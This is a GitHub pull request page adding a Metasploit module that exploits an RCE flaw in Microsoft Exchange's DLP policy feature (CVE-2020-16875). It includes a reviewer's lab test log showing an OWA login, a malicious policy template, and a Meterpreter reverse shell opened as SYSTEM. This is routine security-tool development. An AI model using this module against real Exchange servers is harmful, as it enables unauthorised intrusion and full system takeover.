Add Microsoft Exchange Server DLP Policy RCE (CVE-2020-16875)#14126
Merged
smcintyre-r7 merged 6 commits intorapid7:masterfrom Sep 16, 2020
Merged
Add Microsoft Exchange Server DLP Policy RCE (CVE-2020-16875)#14126smcintyre-r7 merged 6 commits intorapid7:masterfrom
smcintyre-r7 merged 6 commits intorapid7:masterfrom
Conversation
1fe6153 to
1d23bd1
Compare
|
Thanks for your pull request! Before this can be merged, we need the following documentation for your module: |
f48ef06 to
9d0a9c8
Compare
9d0a9c8 to
0b949aa
Compare
0b949aa to
e118ff1
Compare
Contributor
smcintyre-r7
left a comment
There was a problem hiding this comment.
Tested successfully from a combined branch of 14126 + 14139
msf6 exploit(windows/http/exchange_ecp_dlp_policy) > run
[*] Started reverse TCP handler on 192.168.159.128:8443
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated. OWA is running at https://192.168.159.53/owa/
[*] Logging in to OWA with creds alice:Password1
[+] Successfully logged in to OWA
[*] Retrieving ViewState from DLP policy creation page
[+] Successfully retrieved ViewState
[*] Creating custom DLP policy from malicious template
[*] DLP policy name: Abn Amro Hoare Govett Limited Data
[*] Powershell command length: 2092
[*] Sending stage (200262 bytes) to 192.168.159.53
[*] Meterpreter session 1 opened (192.168.159.128:8443 -> 192.168.159.53:6911) at 2020-09-16 12:32:55 -0400
meterpreter >
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-GD5KVDKUNIP
OS : Windows 2016+ (10.0 Build 14393).
Architecture : x64
System Language : en_US
Domain : EXCHG
Logged On Users : 11
Meterpreter : x64/windows
meterpreter >
e0e0ac2 to
03e0b90
Compare
smcintyre-r7
approved these changes
Sep 16, 2020
Contributor
|
Retested this just now with the latest changes that addressed my comments and everything is still working so I'm going to go ahead and get this landed momentarily. |
Contributor
Release NotesNew module |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Requires #14139!
Info
Exploit